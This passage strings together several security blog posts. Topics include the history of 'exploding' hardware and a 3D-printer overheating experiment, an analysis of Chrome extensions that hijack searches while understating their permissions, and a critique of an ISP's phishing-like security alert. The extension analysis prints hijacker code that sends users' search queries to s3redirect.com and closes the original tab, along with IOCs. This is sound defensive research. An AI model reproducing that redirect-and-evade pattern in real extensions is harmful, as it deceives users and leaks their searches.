Even though such a protection act might be welcome and needed, the consequences for an already stressed healthcare cybersecurity industry might be too overwhelming. One could argue that data protection legislation should not be passed on a case by case basis, but should be in place to protect citizens at all times, not just when extra measures are needed to fight a pandemic.

In the meantime, we at Malwarebytes will do our part to support those in the healthcare industry by keeping malware off their machines—that’s one less virus to worry about.

Stay safe everyone!

The post The impact of COVID-19 on healthcare cybersecurity appeared first on Malwarebytes Labs.

Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Emory Roane, policy counsel at Privacy Rights Clearinghouse, about parental monitoring apps.

These tools offer parents the capabilities to spot where their children go, read what their kids read, and prevent them from, for instance, visiting websites deemed inappropriate. And, for the likely majority of parents using these tools, their motives are sympathetic—being online can be a legitimately confusing and dangerous experience.

But where parental monitoring apps begin to cause concern is just how powerful they are.

Tune in to hear about the capabilities of parental monitoring apps, how parents can choose to safely use these with their children, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

  • Intel experienced a leak due to “intel123”—the weak password that secured its server. (Source: Computer Business Review)
  • Fresh Zoom vulnerabilities for its Linux client were demonstrated at DEFCON 2020. (Source: The Hacker News)
  • Researchers saw an increase in scam attacks against users of Netflix, YouTube, HBO, and Twitch. (Source: The Independent)
  • TikTok was found collecting MAC addresses from mobile devices, a tactic that may have violated Google’s policies. (Source: The Wall Street Journal)
  • Several ads for apps labelled “stalkerware” can still be found in Google Play’s search results after the search giant’s advertising ban took effect. (Source: TechCrunch)

Stay safe, everyone!

The post Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane appeared first on Malwarebytes Labs.

Explosive technology and 3D printers: a history of deadly devices

Hackers: They’ll turn your computer into a BOMB!

“Hackers turning computers into bombs” is a now legendary headline, taken from the Weekly World News. It has rather set the bar for “people will murder you with computers” anxiety. Even those familiar with the headline may not have dug into the story too much on account of how silly it sounds, but it’s absolutely well worth checking out if only for the bit about “assassins” and “dangerous sociopaths.”

Has blasting apart your computer “like a large hand grenade” ever been so much fun? Would it only be a little bit terrifying if the hand grenade was incredibly small? How many decently-sized grenades does it take to make your computer explode like a bomb, anyway? Is the bomb also incredibly large? What kind of power are we talking here, because it would frankly be anti-climactic if it turns out to be a hoax.

Maybe the real grenades were the bombs we made along the way

However you stack it up, the antics of highly combustible cyber assassins are often overplayed for dramatic effect. At this point I’d like to ask, “Who remembers the terrible Y2K trend of exploding computers?” but as you’re aware, that didn’t actually end up happening. Lots of hard-working people spent an incredible amount of time ensuring the Millennium bug didn’t cause Millennium-bug related problems, but I don’t think they were thinking of dramatic explosions when they were doing so.

Still, there’s always been a way to affect hardware in (significantly less spectacular) ways, though most incidents seem to stem from user error or hardware tinkering. Even the article above mentions someone claiming to make one of these machines start smoking by writing programs which toggled the cassette relay switch rapidly. I, myself, once woke up to a PC on fire (and I do mean on fire) after something broke overnight, and I was met with the smell of metal burning, plastic melting, and an immediate concern related to not having the house burn down around me.

Evil cyber assassins making you explode, though?

Not that common, sorry. However, there has been the occasional bad event down the years where hardware was specifically targeted in frankly terrifying ways. 

Breaking hardware for fun, profit, and confusion

Before we set down some of the most common techniques by which hardware can be impacted in ways it probably shouldn’t be, we’ll set the bar early and highlight what’s likely the biggest, baddest example of hardware tampering. Stuxnet, a worm targeting SCADA systems, caused large amounts of damage at a nuclear facility in Iran between 2009 and 2010. It did this by speeding up, slowing down, and then speeding up centrifuges till they were unable to cope and broke. Up to 1,000 centrifuges were taken down as a result of the attack [PDF]. This is an assault which clearly took an incredible amount of planning and prep-work to pull off, and you’ll see the phrase “nation-state attack” an awful lot if you go digging into it.

This is, without a doubt, the benchmark for dragging digital attacks into real-world impact. A close runner-up would be 2017’s WannaCry attack which impacted the NHS [PDF]. The key difference is that the plant in Natanz was deliberately targeted, and the infection had specific instructions for a specific task related to the centrifuges. The NHS was “simply” caught in the fallout, and not targeted specifically.

Attacks on people at home, or smaller organisations, tend to be on a much smaller scale. The idea isn’t really to break the hardware beyond repair to make some sort of statement; the device is useful because they can keep on using it. Even so, the impact can range from “mild inconvenience” to “potentially life threatening”. 

What’s mining is mine

You could end up with a higher electricity bill than normal should you find some Bitcoin miners hiding under the hood. This might keep you warm on a chilly winter evening, but it’s not particularly advisable for financial outlay or individual PC parts. The problem with your standard Bitcoin miner placed on a system without permission is the resources they gobble up for computations. They love those big, juicy graphics cards for maximum money-making.

Having said that, your child’s middle-range gaming laptop is also a perfectly acceptable target for them. If the cooling fans are going haywire even when no game is running, it might be time to start running some scans. Overheating can be mitigated on desktops unless they’re clogged up with a lot of dust or faulty parts, but the margin for error is a lot smaller with a laptop. All that heat built up in one significantly smaller space over time isn’t great, and while toasting the machine wouldn’t be part of the Bitcoin miner’s game plan, it’s one side-effect to be wary of.

On the flipside, modern systems are actually pretty good at combating heat…especially if you’re even a little bit into gaming. The reason you don’t see stories in the news about evil hackers melting computers is that a) it is, again, ultimately pointless, and b) it would be pretty difficult to pull off. Hardware comes with all sorts of failsafes: temperature sensors, shutdown routines, power spike protection, and much more. It would mean significant amounts of time and effort, in the vague hope you end up with something a little more impressive than “The PC shut down to prevent damage and it’s fine”.

BIOS/firmware hacks

Could you bludgeon your way into the very innards of the PC, and force it to do all sorts of terrible things? Perhaps. As with a lot of these scenarios, it typically relies on multiple steps and one specific target in mind. Malicious firmware is a possibility, but you’ll need to weigh the risk against the likelihood of it happening. Once more, we see the inherent drawback in “make thing go boom”, or even just bricking the machine forever so it’s unusable. Having someone go to these lengths to attack your PC in this way is probably outside your threat model.

Not impossible, but unlikely. Somebody doing the above wants your data, not your laptop on fire. Even so, you should be cautious about leaving your devices unattended in places that aren’t your home.

IoT compromise

The world is filled with cheap, poorly secured bits of technology filling up our homes. Security is an afterthought, and even where it isn’t, bad things can still happen. At the absolute opposite end from pretend hackers turning your computer into a bomb are the people whose sole intention is to compromise devices and live on them for as long as possible. Information and control are the two key currencies for domestic abusers implanting hacks into hardware.

Awfully bad, but awfully rare

These are all awful things, in varying degrees of severity. They tamper with systems and processes in ways which can directly impact the physical operation of a device, or in a manner which leaves the object intact but causes trouble in the real world in other, less incendiary ways.

In terms of making things blow up, bomb style, we’re still at a bit of a loss.

All the same: there is a genuine threat aspect to all this, as we’re about to find out.

Strap yourself in and command the DeLorean as we jump from a Register article back in July 2000 to another one along similar lines at the tail end of July 2020. Despite the warnings, it’s now 20 years on, and we’re finally at the point where something a bit like your PC could go kaboom.

The entity known as time comes crashing through the window, reminding me of my melted and very much ablaze PC from about fourteen years ago. Your devices can and do catch fire for a variety of reasons, and they don’t have to be related to hacking.

In the case of a 3D printer enthusiast who found their device billowing smoke, the likely culprit was a loose heating element and a bit of bad luck to set everything ablaze. Note that the post-incident assessment includes a rework of the physical space around the device. Everything from storage to safety equipment is now considered, to combat (as they put it), the placement of a heavy-duty bit of kit inside a “burn-my-house-down box”.

This is similar to ensuring the space around a VR gaming setup is also secured, in terms of mats on the floor so you know when you’ve wandered out of the safety zone, wires suspended by the ceiling, no sharp / dangerous items nearby and so on. Sadly, people don’t consider the ways in which physical danger presents itself via digital devices.

Keep all of this in mind, when checking out what comes next.

What comes next is a 3D printer modified with the intention of seeing if it’s possible to “weaponize this 3D printer into a firebomb”.

Weaponizing a 3D printer into a firebomb?

Researchers at Coalfire toiled hard at creating a hand-crafted method to alter the way a specific 3D printer operates and have it hit increasingly dangerous temperatures. In their final bout of testing, the smoke and fumes were so bad in an outdoor location that they couldn’t be closer than 6ft from the smouldering device.

This is, of course, an incredibly bad situation to be in. However, there are some big caveats attached to this one in terms of threat. All 3D printers are a potential fire risk, because they naturally enough involve activities requiring high temperatures. If you leave them alone…and you really shouldn’t…you could end up with the aforementioned burn-my-house-down box. There are also emissions to consider.

In my former life as an artist, I did a lot of work around the old-style MDF, which contained all manner of bad things if you cut into it, and precautions had to be taken. Similarly, you have to pay attention to what may be wafting out of your printer.

I’ve dabbled in 3D printing a little bit, and the technology encourages me to treat it with a healthy bit of respect on account of how deadly it could be by default, with no tampering required, simply via me getting something wrong.

A good approach generally, I find.

Of worst case scenarios

We don’t know for sure how badly the smoking printer incident would’ve ended, given the switch-off when the fumes became too much. A total meltdown seems likely, but a “bomb” as such probably wasn’t on the cards.

This also isn’t something you can casually throw together at the drop of a hat. It’s not one short blog post showing how easy it is; it’s three posts of trying an awful lot of things out. Rooting the printer and cracking passwords, digging into board architecture, installing NSA tools to explore functions. Much more.

Creating extra space to house the new code, adjusting the max temperature variable, then having to figure out how to bypass the error protection closing down any overenthusiastic temperature increases.

Much, much more.

Note also that to force the device to overheat beyond the safe “cut out” point, they had to replace the power supply with something bigger to achieve the required cookout levels.

It’s an awful lot of work to set your printer on fire. Of course, one worry might be a situation where the modified code is somehow pushed to device owners after some sort of compromise. You could also perhaps send people the rogue code directly as a supposed “update” and let them do the hard work.

One way around this is signed code from the vendor, though there’s usually resistance to that from some folks in maker circles because of issues related to planned obsolescence. Additionally, some prefer to download updates directly from the manufacturer’s website and aren’t keen on auto-updates for their printing tools.

Even so: regardless of the issues surrounding who wants which type of update, or if signed code would fix things or bring unforeseen hassles for the end-user, somebody compromising you remotely with this in some way would still need you to have switched out for a bigger power supply for the big boom.

That’s not very likely.

Hackers: they’ll turn your printer into a BOMB!

For the time being, your printer is (probably) not going to fulfil the prophesied digital cyber-grenade of lore. You’ve got more than enough to be getting on with where basic precautions are concerned, never mind worrying about someone blowing up your house with a toaster or USB headphones.

Treat your 3D printer with respect, follow the safety guidelines for your device, and never, ever leave it running and unattended. You don’t want to end up on the front page of the Weekly World News in 2040.

The post Explosive technology and 3D printers: a history of deadly devices appeared first on Malwarebytes Labs.

Chrome extensions that lie about their permissions

“But I checked the permissions before I installed this pop-up-blocker—it said nothing about changing my searches,” my dad retorts after I scold him for installing yet another search-hijacking Chrome extension. Granted, they are not hard to remove, but having to do it over and over is a nuisance. This is especially true because it can be hard to find out which of the Chrome extensions is the culprit if the browser starts acting up.

What happened?

Recently, we came across a family of search hijackers that are deceptive about the permissions they are going to use in their install prompt. One such extension, called PopStop, claims it can only read your browsing history. Seems harmless enough, right?

PopStop install message

The install prompt in the webstore is supposed to give you accurate information about the permissions the extension you are about to install requires. It has become common practice for browser extensions to ask up front only for the permissions they need to function properly, then request additional permissions later, after installation. Why? Users are more likely to trust an extension with limited warnings or when permissions are explained to them.

But what is the use of these informative prompts if they only give you half the story? In this case, the PopStop extension doesn’t just read your browsing history, as the pop-up explains, but it also hijacks your search results.

Some of these extensions are more straightforward about what they do once the user installs them and they show up in the list of installed extensions.

Niux APP extension

But others are consistent in their lies even after they have been installed, which makes it even harder to find out which one is responsible for the search hijack.

PopStop extension

How is this possible?

Google decided at some point to bar extensions that obfuscate their code. That makes it easier to read a plug-in’s programming and conduct appropriate analysis.

The first step in determining what an extension is up to is to look at the manifest.json file.

manifest.json

Registering a script in the manifest tells the extension which file to reference, and, optionally, how that file should behave.

What this manifest tells us is that the only active script is “background.js” and the declared permissions are “tabs” and “storage”. More about those permissions later on.
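
Based on that, a minimal reconstruction of the extension’s manifest.json would look something like this (the name and version fields are illustrative, not taken from the actual extension):

```json
{
  "manifest_version": 2,
  "name": "PopStop",
  "version": "1.0",
  "background": { "scripts": ["background.js"] },
  "permissions": ["tabs", "storage"]
}
```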

The relevant parts in background.js are these pieces, because they show us where our searches are going:

const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401;

chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});
setTimeout(() => {
  chrome.tabs.remove(currentTabId);
}, 10);

This script uses two chrome.tabs methods: One to create a new tab based on your search query, and the other to close the current tab. The closed tab would have displayed the search results from your default search provider.

Looking at the chrome.tabs API, we read:

“You can use most chrome.tabs methods and events without declaring any permissions in the extension’s manifest file. However, if you require access to the url, pendingUrl, title, or favIconUrl properties of tabs.Tab, you must declare the “tabs” permission in the manifest.”

And indeed, in the manifest of this extension we found:

"permissions": [ "tabs", "storage" ],

The “storage” permission does not invoke a message in the warning screen users see when they install an extension. The “tabs” permission is the reason for the “Read your browsing history” message. Although the chrome.tabs API might be used for different reasons, it can also be used to see the URL that is associated with every newly-opened tab.

The extensions we found managed to avoid having to display the message, “Read and change all your data on the websites you visit” that would be associated with the “tabCapture” method. They did this by closing the current tab after capturing your search term and opening a new tab to perform the search for that term on their own site.
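
The capture-and-reopen trick can be sketched with the URL construction factored out into pure functions. Only BASE_DOMAIN and the chrome3.php path come from the extension’s background.js; the function names and structure here are our own reconstruction.

```javascript
const BASE_DOMAIN = 's3redirect.com';

// Pull the search term out of the URL the user just opened; most search
// engines carry it in the "q" query parameter.
function extractQuery(urlString) {
  return new URL(urlString).searchParams.get('q');
}

// Build the replacement URL pointing at the hijacker's own results page.
function hijackUrl(urlString) {
  const searchQuery = extractQuery(urlString);
  return `https://${BASE_DOMAIN}/chrome3.php?q=${encodeURIComponent(searchQuery)}`;
}
```

In the extension, the output of a function like hijackUrl is handed to chrome.tabs.create while chrome.tabs.remove closes the original results tab, so the user only ever sees the hijacker’s page, and no broader data-access warning is ever shown at install time.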

The “normal” permission warnings for a search hijacker would look more similar to this:

warning1 ConvertrSearch

The end effect is the same, but an experienced user would be less likely to install this last extension, as they would either balk at the permission request or recognize the plug-in as a search hijacker by looking at these messages.

Are these extensions really lying?

Some might call it a lie. Some may say no, they simply didn’t offer the whole truth. However, the point of those permissions pop-ups is to give users the choice on whether to download a program by being upfront about what that program asks of its users.

In the case of these Chrome extensions, then, let’s just say that they’re not disclosing the full extent of the consequences of installing their extensions.

It would be desirable for Google to add a warning message for extensions that use the chrome.tabs.create method. This would inform users that the extension can open new tabs, which is one way of showing advertisements, so they would be aware of that possibility. And chrome.tabs.create also happens to be the method these extensions use to replace the search results we were after with their own.

An additional advantage for these extensions is that they are not listed in the settings menu the way a “regular” search hijacker would be.

searchsettings
A search hijacker that replaces your default search engine would be listed under Settings > Search engine

Not being listed as the replacement search engine makes it harder for a user to figure out which extension is responsible for the unexpected search results.

For the moment, these hijackers can be recognized by the new header they add to their search results, which looks like this:

search header

This will probably change once their current domains are flagged as landing pages for hijackers, and new extensions will be created using other landing pages.

Further details

These extensions intercept search results from these domains:

  • aliexpress.com
  • booking.com
  • all Google domains
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

The extensions also intercept all queries that contain the string “spalp2020”. This is probably because that string is a common factor in the installer URLs that belong to the powerapp.download family of hijackers.

spapl2020
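Put together, the interception check can be approximated like this. This is an assumed reconstruction based only on the domain list and marker string above; the `shouldIntercept` function and its matching rules are our own illustration, and the real extensions' logic may differ.

```javascript
// Assumed reconstruction of the interception check; shouldIntercept and
// its matching rules are illustrative, built from the published IOC list.

const TARGET_DOMAINS = [
  "aliexpress.com", "booking.com", "ask.com", "ecosia.org",
  "bing.com", "yahoo.com", "mysearch.com", "duckduckgo.com",
];

function shouldIntercept(urlString) {
  // Queries carrying the installer marker string are always taken over.
  if (urlString.includes("spalp2020")) return true;
  const host = new URL(urlString).hostname;
  // "All Google domains": google.com plus country TLDs like google.nl.
  if (host === "google.com" || host.endsWith(".google.com") ||
      host.includes(".google.")) return true;
  // The fixed list of other search engines.
  return TARGET_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}
```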

Search hijackers

We have written before about the interests of shady developers in the billion-dollar search industry and reported on the different tactics these developers resort to in order to get users to install their extensions or use their search sites[1],[2],[3].

While this family doesn’t use the most deceptive marketing practices out there, it still hides its bad behavior in plain sight. Many users have learned to read install prompt messages carefully to determine whether an extension is safe. It’s disappointing that developers can evade giving honest information and that these extensions make their way into the Web Store again and again.

IOCs

Extension identifiers:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

Search domains:

s3redirect.com

s3arch.page

gooogle.page <= note the extra “o”

Malwarebytes detects these extensions under the detection name PUP.Optional.SearchEngineHijack.Generic.

Stay safe, everyone!

The post Chrome extensions that lie about their permissions appeared first on Malwarebytes Labs.

Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw

“Can you have a look at this email I got, please?” my brother asked. “It looks convincing enough, but I don’t trust it,” he added and forwarded me the email he received from Ziggo, his Internet Service Provider (ISP). Shortly after, he informed me that despite its suspicious aura, he found confirmation that the email was, in fact, legitimate.

In the suspect email, the Dutch ISP informed customers that an expert had found a weakness in the “Wifibooster Ziggo C7,” a device they sell to strengthen WiFi signals. Ziggo told users how to recognize this equipment, and urged them to change the default password and settings.

So what’s the problem? Alerting customers about a security flaw is best practice, is it not? Absolutely. But when your email alert about a security vulnerability looks like a phish itself, it’s time to reevaluate your email marketing strategy.

In this blog, I’ll break down what exactly happened with Ziggo, the flaws in their email communication, and how organizations should approach informing their employees and customers about potential security issues—without looking like a phishing scam.

What exactly happened?

Dutch ISP Ziggo sent out an email to their customers warning about a security weakness in a specific device that they sell to their customers. I translated the relevant parts of the mail from Dutch below:

“Dear Mister Arntz,

To keep our network safe, experts are looking for weak spots. Unfortunately, such a weakness was found in the Wifibooster Ziggo C7. You can recognize the device by the ‘C7’ mark at the bottom. This email is about this device and this type only.

Do you indeed use the Wifibooster Ziggo C7? In that case change the default settings in your personal settings to keep your device safe. Below we will explain how.

How to change your password

To make the chance of abuse as small as possible, it’s necessary to change your password. Go to link to Ziggo site, follow the instructions there and use a strong password.

Want to know more or need help?

Follow the link to the Ziggo forum where you can find more information about this subject and ask for help from the community members.”

This vague, unhelpful, and frankly dangerous advice was followed by a footer that contained nine more links, including (ironically enough) an anti-phishing warning.

What made the email look spammy?

We have spent years training people to recognize spam emails, and it is gratifying to see those efforts pay off on occasion. The things my brother found spammy were the weird-looking links throughout the email and the fact that he did not own the device that was its subject.

I would like to add that the email mentioned a security weakness but did not specify which one. And urging recipients to change their password to avert an unspecified danger is a classic give-away in a phishing mail.

So, we’ve got:

  • The subject did not apply to all recipients; not every addressee owned the device. When asked, Ziggo stated they wanted to make sure that users who bought the device second-hand would be aware of the issue too.
  • A multitude of links that looked phishy, probably because they were personalized.
phishy looking link
  • Urging recipients to go to a site and take precautions against an unclear threat.

The device

The Wifibooster Ziggo C7 is in fact a TP-Link Archer C7 that Ziggo sells to their customers with their own firmware installed. Therefore, it is hard to find any information about what the vulnerability might be. The Archer C7 is listed as affected by the WPA2 Security (KRACKs) vulnerability for certain firmware versions. But given the Ziggo device comes with custom firmware, it is hard to determine whether the Wifibooster Ziggo C7 is vulnerable as well.

Given that users are urged to change their WiFi password and network name (SSID), and judging by the instructions we found on the site, we are inclined to conclude that the device shipped with default credentials, which could help attackers exploit a remote access vulnerability.

The possible danger

Ziggo warned the users that not following their instructions could lead to unauthorized access to their network.

We asked our resident hardware guru JP Taggart about this scenario, and he was very wary of ISPs that apply more than some branding tweaks to the manufacturer’s firmware. Once you drift away from the standard firmware, you become responsible for maintaining and patching that firmware, because the manufacturer will no longer be able, or even willing, to do so. We looked at some existing vulnerabilities for the Archer C7, but they are old, and even if they applied, they could not be remedied by changing the password and SSID.

ISPs make a habit of branding the firmware of the equipment they sell to their customers. Logic dictates that the security flaw must have been in this branded firmware, since we could not find any other recent warnings about this particular type of device, which would demonstrate JP Taggart’s point about the dangers of branded firmware.

What Ziggo could have done better

The most objectionable part of the way Ziggo chose to inform its customers is the phishy-looking format of the email. The more companies do this, the harder it becomes for us to tell real phishes apart from legitimate emails. To be honest, some of the more sophisticated phishers have produced emails that looked less phishy than this one.

They also could have been a lot more open about the security flaw that was found. Of course, we don’t expect them to post a full hacker’s guide on how to exploit the weakness and spy on your neighbor, but a little concrete information about what was found and how it could be exploited would have made sense.

As for the instructions on how to change the settings, it would have been preferable to list the basic steps in the email and include a link for those who need further or more detailed instructions. All relevant and necessary information should have been in the mail itself, not behind a link. Links are fine, but not for crucial information.

During the installation of such a device, the ISP should force the user to change at least the default password, and probably advise them to change the SSID as well. A default SSID tells an aspiring hacker which ISP you are using, letting them make informed guesses about which equipment you are running.

The danger of sending out phishy emails

Recipients may have deleted the mail at first sight and never changed their password, leaving them vulnerable to the flaw.

Or, as our own William Tsing wrote in an older post called When corporate communications look like a phish:

“Essentially, well-meaning communications with these design flaws train an overloaded employee to exhibit bad behaviors—despite anti-phishing training—and discourage seeking help.”

The same goes for home users, who may not receive as many emails at home as an office employee does (120), but those who do receive a lot of mail have trained themselves to recognize which emails are important and ignore the rest. That would be a shame if the enclosed information is as important as the ISP wants us to believe.

Stay safe, everyone!

The post Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw appeared first on Malwarebytes Labs.